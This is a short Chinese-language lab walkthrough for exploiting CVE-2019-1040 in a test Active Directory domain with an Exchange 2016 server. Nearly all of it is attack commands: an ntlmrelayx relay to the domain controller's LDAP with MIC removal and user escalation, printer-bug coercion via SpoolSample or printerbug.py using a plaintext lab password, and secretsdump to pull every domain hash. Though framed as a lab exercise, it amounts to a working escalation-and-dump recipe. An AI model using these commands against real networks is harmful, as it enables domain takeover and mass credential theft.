CVE-2019-1040
漏洞概述
https://daiker.gitbook.io/windows-protocol/ntlm-pian/7#5-cve-2019-1040
环境
| 角色 | 系统 | 计算机名 | 地址 | 域 |
|---|---|---|---|---|
| 攻击机 | kali | 192.168.1.103 | ||
| 域控 | windows2012R2 | sync-dc | 192.168.110.12 | sync.net |
| exchange2016 | windows2016 | sync-ex2016 | 192.168.110.81 | sync.net |
利用条件
- 在域内
或者 - 已知一个域用户的帐号或ntlm-hash
操作
攻击机开启中继
impacket-ntlmrelayx --escalate-user chenli -t ldap://192.168.110.12 -smb2support --remove-mic --delegate-access -debug
chenli 要提升权限的用户名

使用打印机bug
- windows下
spoolsample.exe exchangeIP 攻击机IP

- kali下
python3 printerbug.py sync.net/chenli:cl123\!\@\#45@192.168.110.81 192.168.1.103

- 中继"提权"中

dumpHASH
- windows下
secretsdump.exe sync.net/chenli@sync-dc -just-dc

- kali下
impacket-secretsdump -just-dc sync.net/chenli@192.168.110.12


浙公网安备 33010602011771号